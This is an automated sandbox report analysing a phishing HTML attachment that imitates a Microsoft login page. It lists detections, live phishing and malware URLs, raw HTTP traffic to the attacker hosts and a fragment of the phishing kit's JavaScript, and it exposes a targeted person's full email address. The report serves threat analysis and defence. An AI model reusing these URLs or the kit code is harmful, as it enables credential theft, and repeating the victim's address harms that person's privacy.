Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ATT60255.HTM

Overview

General Information

Sample name:ATT60255.HTM
Analysis ID:1500134
MD5:45a5630a8866c09a1ebbf976cd4063b8
SHA1:016e3ac60bbc732a6ec220b9e9e61b07e5efda76
SHA256:4fbc40af35b1a3e69cf0adf2bf86a06d750babffcbce39650dbded3e11de0433
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish10
HTML IFrame injector detected
HTML Script injector detected
HTML file submission containing password form
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)

Classification

  • System is w10x64
  • chrome.exe (PID: 6628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT60255.HTM" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2320,i,10043383887662201719,1952149342407670854,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://kpl2.r04ar2.com/ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/90e3UQoFnPZnefHhdNMQPyz73Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/90BLxVXhpRTD45c1Cvst53Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/12HMveiyHPabpIUo8913Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/12Vj5xeItpngol5p78GsRYKIFop50Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/xy7B16Rpqjcafef30Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/rsudZieQRPg934N9fbuv40Avira URL Cloud: Label: phishing
      Source: https://KPL2.r04ar2.com/KPL2/?em=natasha.hammondAvira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/eflbaMIh8KvYQ56Fw0I2qKmn100Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/34u2dqhNgiTTAmhQJRfAlijwjGO22rrieg8N89109Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAvira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/45lL7KipMN4YrD89WlFkKCVxy70Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.auAvira URL Cloud: Label: phishing
      Source: https://nse.idwp.ru/srsldqgbwnlyknaiuilfjcyqoKGYnePGFJAVJGZCNGFCUJYLNOCYUZRFYFVSVVQBpqvHhnoPyzuWRNahuv40Avira URL Cloud: Label: malware
      Source: https://kpl2.r04ar2.com/apsDh9aBaVhYjUySTyaOt7dEJs5tAvira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193Avira URL Cloud: Label: phishing
      Source: https://kpl2.r04ar2.com/lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizbAvira URL Cloud: Label: phishing
      Source: https://wox.dultzman.ru/yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCCAvira URL Cloud: Label: malware

      Phishing

      barindex
      Source: Yara matchFile source: 1.6.pages.csv, type: HTML
      Source: Yara matchFile source: 1.5.pages.csv, type: HTML
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: New IFrame, src: https://href.li/?https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: New script, src: https://www.gstatic.com/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__en.js
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: New script, src: https://www.gstatic.com/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__en.js
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: Base64 decoded: <script>
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auMatcher: Found strong image similarity, brand: MICROSOFT
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auMatcher: Template: microsoft matched
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auMatcher: Template: microsoft matched
      Source: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "vx4ff";var emailcheck = "natasha.hammond@lchs.com.au";var webname = "rtrim(/web8/, '/')";var urlo = "lvytc1gayeghfhs4njumnmax70plgnrgw39kizb";var gdf = "ijq0gxuthn3eysabiuvx9qo9lb6ksy0fmmudab120";var odf = "ijtjphirgnsek0kkai7qthcoj6na6uvtquurwjypp30cyucd650";var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";let useragent = navigator.useragent;let browsername;let userip;let usercountry;var errorcodeexecuted = false;if(useragent.match(/chrome|chromium|crios/i)){ browsername = "chrome";} else if(useragent.match(/firefox|fxios/i)){ browsername = "firefox";} else if(useragent.match(/safari/i)){ browsername = "safari";} else if(useragent.match(/opr\//i)){ browsername = "opera";} else if(useragent.match(/edg/i)){ browsername = "edge";} else{ browsername="no browser detection";}function encryptdata(data) { const key = cryptoj...
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: ATT60255.HTMHTTP Parser: Base64 decoded: https://href.li/?https://KPL2.r04ar2.com/KPL2/
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: Title: mIquPOSkDYMvm3Vd does not match URL
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: Invalid link: Terms of use
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: Invalid link: Privacy & cookies
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: Invalid link: Terms of use
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: Invalid link: Privacy & cookies
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: Has password / email / username input fields
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: <input type="password" .../> found
      Source: ATT60255.HTMHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/Desktop/ATT60255.HTM#?em=natasha.hammond@lchs.com.auHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49887 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.4:65237 -> 1.1.1.1:53
      Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
      Source: Joe Sandbox ViewIP Address: 104.26.1.100 104.26.1.100
      Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
      Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
      Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /?https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au HTTP/1.1Host: href.liConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /KPL2/?em=natasha.hammond@lchs.com.au HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCC HTTP/1.1Host: wox.dultzman.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://kpl2.r04ar2.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCC HTTP/1.1Host: wox.dultzman.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://kpl2.r04ar2.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b9f6497ee820fa4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b9f6497ee820fa4&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8b9f6497ee820fa4/1724796641793/1d41b0915d96664d4c421588daa101f93a8179105dc076a56dbf01d319f547c8/wIkiMbIg4-l0Z4N HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oOFFLGOpXKGaktU&MD=FTxB8uzd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8b9f6497ee820fa4/1724796641795/JJoPtCsZIVs8EyO HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
